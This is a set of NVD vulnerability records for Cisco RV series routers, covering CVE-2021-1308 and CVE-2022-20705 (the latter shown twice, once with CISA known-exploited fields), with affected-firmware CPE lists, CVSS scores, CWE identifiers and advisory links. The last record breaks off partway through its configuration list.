Vulnerabilites related to cisco - rv260p
Vulnerability from fkie_nvd
Published
2021-04-08 04:15
Modified
2024-11-21 05:44
Summary
Multiple vulnerabilities exist in the Link Layer Discovery Protocol (LLDP) implementation for Cisco Small Business RV Series Routers. An unauthenticated, adjacent attacker could execute arbitrary code or cause an affected router to leak system memory or reload. A memory leak or device reload would cause a denial of service (DoS) condition on an affected device. For more information about these vulnerabilities, see the Details section of this advisory. Note: LLDP is a Layer 2 protocol. To exploit these vulnerabilities, an attacker must be in the same broadcast domain as the affected device (Layer 2 adjacent).



{
   configurations: [
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:cisco:rv132w_firmware:1.0.0.14:*:*:*:*:*:*:*",
                     matchCriteriaId: "8C12141B-531E-44A5-AD79-16504B31D384",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:cisco:rv132w_firmware:1.0.1.14:*:*:*:*:*:*:*",
                     matchCriteriaId: "F5759C3B-CE24-47A4-8513-A2C24028973E",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:cisco:rv132w_firmware:1.0.1.20:*:*:*:*:*:*:*",
                     matchCriteriaId: "5CB50517-FD1B-4207-B63B-4E33F7654E2E",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:cisco:rv132w:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "8511C48D-9EA6-4521-988C-61E1035BEFA1",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:cisco:rv134w_firmware:1.0.0.14:*:*:*:*:*:*:*",
                     matchCriteriaId: "2835C440-025B-414F-BED1-5DA20431E726",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:cisco:rv134w_firmware:1.0.1.14:*:*:*:*:*:*:*",
                     matchCriteriaId: "C1E2F2A9-4118-4778-94AB-C996A6F56F0F",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:cisco:rv134w_firmware:1.0.1.20:*:*:*:*:*:*:*",
                     matchCriteriaId: "62CC81E5-DA22-47A1-9D02-00A86DED8D96",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:cisco:rv134w:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "39710CC4-1891-4E4B-AF65-AC2577CC8FFC",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:cisco:rv160_firmware:1.0.0.14:*:*:*:*:*:*:*",
                     matchCriteriaId: "BAA1FCAC-F214-46F5-B2D7-751B24865236",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:cisco:rv160_firmware:1.0.1.14:*:*:*:*:*:*:*",
                     matchCriteriaId: "BF13C864-9853-453C-B495-6C642DE9CB69",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:cisco:rv160_firmware:1.0.1.20:*:*:*:*:*:*:*",
                     matchCriteriaId: "DA85E0EA-C194-4683-BA09-7C68080924E0",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:cisco:rv160:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "EC1DC21D-8C6C-4CE7-B5CB-8646659B02BC",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:cisco:rv160w_firmware:1.0.0.14:*:*:*:*:*:*:*",
                     matchCriteriaId: "F75F5D34-CED9-4390-AC75-7F592175DD67",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:cisco:rv160w_firmware:1.0.1.14:*:*:*:*:*:*:*",
                     matchCriteriaId: "79A57FFD-BA26-4F6E-B45F-2DF212908843",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:cisco:rv160w_firmware:1.0.1.20:*:*:*:*:*:*:*",
                     matchCriteriaId: "95130A28-C573-4BDF-ABDB-45EE96E94406",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:cisco:rv160w:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "2B7E3792-5D0F-4CCC-874D-512059CA8E12",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:cisco:rv260_firmware:1.0.0.14:*:*:*:*:*:*:*",
                     matchCriteriaId: "9AA93AAF-F894-44AE-98D6-DBF868AC4EBB",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:cisco:rv260_firmware:1.0.1.14:*:*:*:*:*:*:*",
                     matchCriteriaId: "EEE01B7F-692D-405D-938D-35E83C62D8F2",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:cisco:rv260_firmware:1.0.1.20:*:*:*:*:*:*:*",
                     matchCriteriaId: "FEA38FA6-CACA-4553-853C-E36D6395C3E4",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:cisco:rv260:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "6FFC99C1-954E-408B-8A08-C79941350F05",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:cisco:rv260p_firmware:1.0.0.14:*:*:*:*:*:*:*",
                     matchCriteriaId: "9A035A4A-B82A-4F0B-8D38-4DD280037C11",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:cisco:rv260p_firmware:1.0.1.14:*:*:*:*:*:*:*",
                     matchCriteriaId: "CD084D1A-A03D-4854-9727-76C1FBC1A265",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:cisco:rv260p_firmware:1.0.1.20:*:*:*:*:*:*:*",
                     matchCriteriaId: "BDA8B5D4-821E-48CB-81EA-943BD1039087",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:cisco:rv260p:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "A62A6E2F-FA43-4F40-A684-651FEDAC2114",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:cisco:rv260w_firmware:1.0.0.14:*:*:*:*:*:*:*",
                     matchCriteriaId: "F84DC383-4F05-4294-9008-B5223353526D",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:cisco:rv260w_firmware:1.0.1.14:*:*:*:*:*:*:*",
                     matchCriteriaId: "A5DC3490-6E60-4806-874D-E23572DEAF35",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:cisco:rv260w_firmware:1.0.1.20:*:*:*:*:*:*:*",
                     matchCriteriaId: "9FED3BFB-7AA7-4A49-B911-58D7CBE8D704",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:cisco:rv260w:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "95737F9F-1779-4AAB-875E-2CD586A8B780",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:cisco:rv340_firmware:1.0.0.14:*:*:*:*:*:*:*",
                     matchCriteriaId: "EFC9C7EC-388E-476D-A444-EE9BEE3FD578",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:cisco:rv340_firmware:1.0.1.14:*:*:*:*:*:*:*",
                     matchCriteriaId: "41A8558B-85AC-442A-9E3E-27EC127C5B33",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:cisco:rv340_firmware:1.0.1.20:*:*:*:*:*:*:*",
                     matchCriteriaId: "DD473F62-964C-4D15-B0B6-D9D4AB8E2C1B",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:cisco:rv340:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "2A4411AC-2A74-4315-BA6B-D7E1AA538BDB",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:cisco:rv340w_firmware:1.0.0.14:*:*:*:*:*:*:*",
                     matchCriteriaId: "4165E6FA-C876-45B4-B48A-7B1D51A028BA",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:cisco:rv340w_firmware:1.0.1.14:*:*:*:*:*:*:*",
                     matchCriteriaId: "1B8FB0F6-CAE9-481C-9FC7-69CA0660F506",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:cisco:rv340w_firmware:1.0.1.20:*:*:*:*:*:*:*",
                     matchCriteriaId: "35729306-0CFF-4ACD-B77D-172A92FD67DF",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:cisco:rv340w:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "21E55019-F969-4ACD-A6C8-1D2EE05F8EE4",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:cisco:rv345_firmware:1.0.0.14:*:*:*:*:*:*:*",
                     matchCriteriaId: "784C42BE-E7CD-45F0-8209-436F54812C1D",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:cisco:rv345_firmware:1.0.1.14:*:*:*:*:*:*:*",
                     matchCriteriaId: "BEA2331F-521F-4987-83A1-6D0D458B41DB",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:cisco:rv345_firmware:1.0.1.20:*:*:*:*:*:*:*",
                     matchCriteriaId: "90F3DC42-58C9-4BC4-AFCC-077C0BDAAB2E",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:cisco:rv345:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "5E91E68B-CBE9-462E-82D4-6F588B8E84E8",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:cisco:rv345p_firmware:1.0.0.14:*:*:*:*:*:*:*",
                     matchCriteriaId: "5FB2292D-20C8-4929-9802-7FC770952200",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:cisco:rv345p_firmware:1.0.1.14:*:*:*:*:*:*:*",
                     matchCriteriaId: "3E16124B-9448-47A0-A6BF-A95B37446E91",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:cisco:rv345p_firmware:1.0.1.20:*:*:*:*:*:*:*",
                     matchCriteriaId: "948587E0-67B8-4A80-AFAA-96A22F522F42",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:cisco:rv345p:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "5120BAB7-FB3A-481E-9ECD-48341846AFBD",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
   ],
   cveTags: [],
   descriptions: [
      {
         lang: "en",
         value: "Multiple vulnerabilities exist in the Link Layer Discovery Protocol (LLDP) implementation for Cisco Small Business RV Series Routers. An unauthenticated, adjacent attacker could execute arbitrary code or cause an affected router to leak system memory or reload. A memory leak or device reload would cause a denial of service (DoS) condition on an affected device. For more information about these vulnerabilities, see the Details section of this advisory. Note: LLDP is a Layer 2 protocol. To exploit these vulnerabilities, an attacker must be in the same broadcast domain as the affected device (Layer 2 adjacent).",
      },
      {
         lang: "es",
         value: "Múltiples vulnerabilidades en la implementación del Link Layer Discovery Protocol (LLDP) para Enrutadores Cisco Small Business RV Series. Un atacante adyacente no autenticado podría ejecutar código arbitrario o hacer que un enrutador afectado filtre la memoria del sistema o se recargue. Una pérdida de memoria o la recarga del dispositivo podrían causar una condición de denegación de servicio (DoS) en un dispositivo afectado. Para mayor información sobre estas vulnerabilidades, consulte la sección Detalles de este aviso. Nota: LLDP es un protocolo de Capa 2. Para explotar estas vulnerabilidades, un atacante debe estar en el mismo dominio de transmisión que el dispositivo afectado (adyacente a Capa 2)",
      },
   ],
   id: "CVE-2021-1308",
   lastModified: "2024-11-21T05:44:03.550",
   metrics: {
      cvssMetricV2: [
         {
            acInsufInfo: false,
            baseSeverity: "MEDIUM",
            cvssData: {
               accessComplexity: "LOW",
               accessVector: "ADJACENT_NETWORK",
               authentication: "NONE",
               availabilityImpact: "COMPLETE",
               baseScore: 6.1,
               confidentialityImpact: "NONE",
               integrityImpact: "NONE",
               vectorString: "AV:A/AC:L/Au:N/C:N/I:N/A:C",
               version: "2.0",
            },
            exploitabilityScore: 6.5,
            impactScore: 6.9,
            obtainAllPrivilege: false,
            obtainOtherPrivilege: false,
            obtainUserPrivilege: false,
            source: "nvd@nist.gov",
            type: "Primary",
            userInteractionRequired: false,
         },
      ],
      cvssMetricV31: [
         {
            cvssData: {
               attackComplexity: "LOW",
               attackVector: "ADJACENT_NETWORK",
               availabilityImpact: "HIGH",
               baseScore: 7.4,
               baseSeverity: "HIGH",
               confidentialityImpact: "NONE",
               integrityImpact: "NONE",
               privilegesRequired: "NONE",
               scope: "CHANGED",
               userInteraction: "NONE",
               vectorString: "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H",
               version: "3.1",
            },
            exploitabilityScore: 2.8,
            impactScore: 4,
            source: "ykramarz@cisco.com",
            type: "Secondary",
         },
         {
            cvssData: {
               attackComplexity: "LOW",
               attackVector: "ADJACENT_NETWORK",
               availabilityImpact: "HIGH",
               baseScore: 7.4,
               baseSeverity: "HIGH",
               confidentialityImpact: "NONE",
               integrityImpact: "NONE",
               privilegesRequired: "NONE",
               scope: "CHANGED",
               userInteraction: "NONE",
               vectorString: "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H",
               version: "3.1",
            },
            exploitabilityScore: 2.8,
            impactScore: 4,
            source: "nvd@nist.gov",
            type: "Primary",
         },
      ],
   },
   published: "2021-04-08T04:15:11.983",
   references: [
      {
         source: "ykramarz@cisco.com",
         tags: [
            "Vendor Advisory",
         ],
         url: "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-rv-multi-lldp-u7e4chCe",
      },
      {
         source: "af854a3a-2127-422b-91ae-364da2661108",
         tags: [
            "Vendor Advisory",
         ],
         url: "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-rv-multi-lldp-u7e4chCe",
      },
   ],
   sourceIdentifier: "ykramarz@cisco.com",
   vulnStatus: "Modified",
   weaknesses: [
      {
         description: [
            {
               lang: "en",
               value: "CWE-119",
            },
         ],
         source: "ykramarz@cisco.com",
         type: "Secondary",
      },
      {
         description: [
            {
               lang: "en",
               value: "CWE-401",
            },
         ],
         source: "nvd@nist.gov",
         type: "Primary",
      },
   ],
}

Vulnerability from fkie_nvd
Published
2022-02-10 18:15
Modified
2024-11-21 06:43
Summary
Multiple vulnerabilities in Cisco Small Business RV160, RV260, RV340, and RV345 Series Routers could allow an attacker to do any of the following: Execute arbitrary code Elevate privileges Execute arbitrary commands Bypass authentication and authorization protections Fetch and run unsigned software Cause denial of service (DoS) For more information about these vulnerabilities, see the Details section of this advisory.



{
   configurations: [
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:cisco:rv340_firmware:*:*:*:*:*:*:*:*",
                     matchCriteriaId: "2C925382-A223-4342-83D2-53B3071F9B45",
                     versionEndIncluding: "1.0.03.24",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:cisco:rv340:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "2A4411AC-2A74-4315-BA6B-D7E1AA538BDB",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:cisco:rv340w_firmware:*:*:*:*:*:*:*:*",
                     matchCriteriaId: "DDD6C848-8EF9-410A-B899-02F0E03EB653",
                     versionEndIncluding: "1.0.03.24",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:cisco:rv340w:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "21E55019-F969-4ACD-A6C8-1D2EE05F8EE4",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:cisco:rv345_firmware:*:*:*:*:*:*:*:*",
                     matchCriteriaId: "CE4C000C-89AB-4255-8D2B-4520BCB90490",
                     versionEndIncluding: "1.0.03.24",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:cisco:rv345:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "5E91E68B-CBE9-462E-82D4-6F588B8E84E8",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:cisco:rv345p_firmware:*:*:*:*:*:*:*:*",
                     matchCriteriaId: "0EA14E0B-442A-467D-92FF-369AD3A1A294",
                     versionEndIncluding: "1.0.03.24",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:cisco:rv345p:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "5120BAB7-FB3A-481E-9ECD-48341846AFBD",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:cisco:rv160_firmware:*:*:*:*:*:*:*:*",
                     matchCriteriaId: "54D9FCD7-3DB5-413E-B504-8658A2D38EB7",
                     versionEndIncluding: "1.0.01.05",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:cisco:rv160:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "EC1DC21D-8C6C-4CE7-B5CB-8646659B02BC",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:cisco:rv160w_firmware:*:*:*:*:*:*:*:*",
                     matchCriteriaId: "30C2C2D2-9466-4A3F-A96C-166E32742C6C",
                     versionEndIncluding: "1.0.01.05",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:cisco:rv160w:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "2B7E3792-5D0F-4CCC-874D-512059CA8E12",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:cisco:rv260_firmware:*:*:*:*:*:*:*:*",
                     matchCriteriaId: "A21C17DD-A010-4744-9E06-DB845C5A1F00",
                     versionEndIncluding: "1.0.01.05",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:cisco:rv260:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "6FFC99C1-954E-408B-8A08-C79941350F05",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:cisco:rv260p_firmware:*:*:*:*:*:*:*:*",
                     matchCriteriaId: "428E4FFE-60EA-4BC1-BF13-FE50F5B093C0",
                     versionEndIncluding: "1.0.01.05",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:cisco:rv260p:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "A62A6E2F-FA43-4F40-A684-651FEDAC2114",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:cisco:rv260w_firmware:*:*:*:*:*:*:*:*",
                     matchCriteriaId: "ED00C268-23EB-4743-8EF1-EEA2BE8A7566",
                     versionEndIncluding: "1.0.01.05",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:cisco:rv260w:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "95737F9F-1779-4AAB-875E-2CD586A8B780",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
   ],
   cveTags: [],
   descriptions: [
      {
         lang: "en",
         value: "Multiple vulnerabilities in Cisco Small Business RV160, RV260, RV340, and RV345 Series Routers could allow an attacker to do any of the following: Execute arbitrary code Elevate privileges Execute arbitrary commands Bypass authentication and authorization protections Fetch and run unsigned software Cause denial of service (DoS) For more information about these vulnerabilities, see the Details section of this advisory.",
      },
      {
         lang: "es",
         value: "Múltiples vulnerabilidades en los routers Cisco Small Business RV160, RV260, RV340 y RV345 Series podrían permitir a un atacante realizar cualquiera de las siguientes acciones Ejecutar código arbitrario. Elevar los privilegios. Ejecutar comandos arbitrarios. Omitir las protecciones de autenticación y autorización. Obtener y ejecutar software no firmado. Causar una denegación de servicio (DoS) Para obtener más información sobre estas vulnerabilidades, consulte la sección Detalles de este aviso",
      },
   ],
   id: "CVE-2022-20705",
   lastModified: "2024-11-21T06:43:22.260",
   metrics: {
      cvssMetricV2: [
         {
            acInsufInfo: false,
            baseSeverity: "HIGH",
            cvssData: {
               accessComplexity: "LOW",
               accessVector: "NETWORK",
               authentication: "NONE",
               availabilityImpact: "PARTIAL",
               baseScore: 7.5,
               confidentialityImpact: "PARTIAL",
               integrityImpact: "PARTIAL",
               vectorString: "AV:N/AC:L/Au:N/C:P/I:P/A:P",
               version: "2.0",
            },
            exploitabilityScore: 10,
            impactScore: 6.4,
            obtainAllPrivilege: false,
            obtainOtherPrivilege: false,
            obtainUserPrivilege: false,
            source: "nvd@nist.gov",
            type: "Primary",
            userInteractionRequired: false,
         },
      ],
      cvssMetricV31: [
         {
            cvssData: {
               attackComplexity: "LOW",
               attackVector: "NETWORK",
               availabilityImpact: "HIGH",
               baseScore: 10,
               baseSeverity: "CRITICAL",
               confidentialityImpact: "HIGH",
               integrityImpact: "HIGH",
               privilegesRequired: "NONE",
               scope: "CHANGED",
               userInteraction: "NONE",
               vectorString: "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H",
               version: "3.1",
            },
            exploitabilityScore: 3.9,
            impactScore: 6,
            source: "ykramarz@cisco.com",
            type: "Secondary",
         },
         {
            cvssData: {
               attackComplexity: "LOW",
               attackVector: "NETWORK",
               availabilityImpact: "HIGH",
               baseScore: 9.8,
               baseSeverity: "CRITICAL",
               confidentialityImpact: "HIGH",
               integrityImpact: "HIGH",
               privilegesRequired: "NONE",
               scope: "UNCHANGED",
               userInteraction: "NONE",
               vectorString: "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
               version: "3.1",
            },
            exploitabilityScore: 3.9,
            impactScore: 5.9,
            source: "nvd@nist.gov",
            type: "Primary",
         },
      ],
   },
   published: "2022-02-10T18:15:09.307",
   references: [
      {
         source: "ykramarz@cisco.com",
         url: "http://packetstormsecurity.com/files/170988/Cisco-RV-Series-Authentication-Bypass-Command-Injection.html",
      },
      {
         source: "ykramarz@cisco.com",
         tags: [
            "Vendor Advisory",
         ],
         url: "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-smb-mult-vuln-KA9PK6D",
      },
      {
         source: "ykramarz@cisco.com",
         tags: [
            "Third Party Advisory",
            "VDB Entry",
         ],
         url: "https://www.zerodayinitiative.com/advisories/ZDI-22-409/",
      },
      {
         source: "ykramarz@cisco.com",
         tags: [
            "Third Party Advisory",
            "VDB Entry",
         ],
         url: "https://www.zerodayinitiative.com/advisories/ZDI-22-410/",
      },
      {
         source: "ykramarz@cisco.com",
         tags: [
            "Third Party Advisory",
            "VDB Entry",
         ],
         url: "https://www.zerodayinitiative.com/advisories/ZDI-22-415/",
      },
      {
         source: "af854a3a-2127-422b-91ae-364da2661108",
         url: "http://packetstormsecurity.com/files/170988/Cisco-RV-Series-Authentication-Bypass-Command-Injection.html",
      },
      {
         source: "af854a3a-2127-422b-91ae-364da2661108",
         tags: [
            "Vendor Advisory",
         ],
         url: "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-smb-mult-vuln-KA9PK6D",
      },
      {
         source: "af854a3a-2127-422b-91ae-364da2661108",
         tags: [
            "Third Party Advisory",
            "VDB Entry",
         ],
         url: "https://www.zerodayinitiative.com/advisories/ZDI-22-409/",
      },
      {
         source: "af854a3a-2127-422b-91ae-364da2661108",
         tags: [
            "Third Party Advisory",
            "VDB Entry",
         ],
         url: "https://www.zerodayinitiative.com/advisories/ZDI-22-410/",
      },
      {
         source: "af854a3a-2127-422b-91ae-364da2661108",
         tags: [
            "Third Party Advisory",
            "VDB Entry",
         ],
         url: "https://www.zerodayinitiative.com/advisories/ZDI-22-415/",
      },
   ],
   sourceIdentifier: "ykramarz@cisco.com",
   vulnStatus: "Modified",
   weaknesses: [
      {
         description: [
            {
               lang: "en",
               value: "CWE-121",
            },
         ],
         source: "ykramarz@cisco.com",
         type: "Secondary",
      },
      {
         description: [
            {
               lang: "en",
               value: "CWE-787",
            },
         ],
         source: "nvd@nist.gov",
         type: "Primary",
      },
   ],
}

Vulnerability from fkie_nvd
Published
2022-02-10 18:15
Modified
2024-11-21 06:43
Summary
Multiple vulnerabilities in Cisco Small Business RV160, RV260, RV340, and RV345 Series Routers could allow an attacker to do any of the following: Execute arbitrary code Elevate privileges Execute arbitrary commands Bypass authentication and authorization protections Fetch and run unsigned software Cause denial of service (DoS) For more information about these vulnerabilities, see the Details section of this advisory.



{
   cisaActionDue: "2022-03-17",
   cisaExploitAdd: "2022-03-03",
   cisaRequiredAction: "Apply updates per vendor instructions.",
   cisaVulnerabilityName: "Cisco Small Business RV Series Routers Stack-based Buffer Overflow Vulnerability",
   configurations: [
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:cisco:rv340_firmware:*:*:*:*:*:*:*:*",
                     matchCriteriaId: "2C925382-A223-4342-83D2-53B3071F9B45",
                     versionEndIncluding: "1.0.03.24",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:cisco:rv340:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "2A4411AC-2A74-4315-BA6B-D7E1AA538BDB",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:cisco:rv340w_firmware:*:*:*:*:*:*:*:*",
                     matchCriteriaId: "DDD6C848-8EF9-410A-B899-02F0E03EB653",
                     versionEndIncluding: "1.0.03.24",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:cisco:rv340w:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "21E55019-F969-4ACD-A6C8-1D2EE05F8EE4",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:cisco:rv345_firmware:*:*:*:*:*:*:*:*",
                     matchCriteriaId: "CE4C000C-89AB-4255-8D2B-4520BCB90490",
                     versionEndIncluding: "1.0.03.24",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:cisco:rv345:-:*:*:*:*:*:*:*",
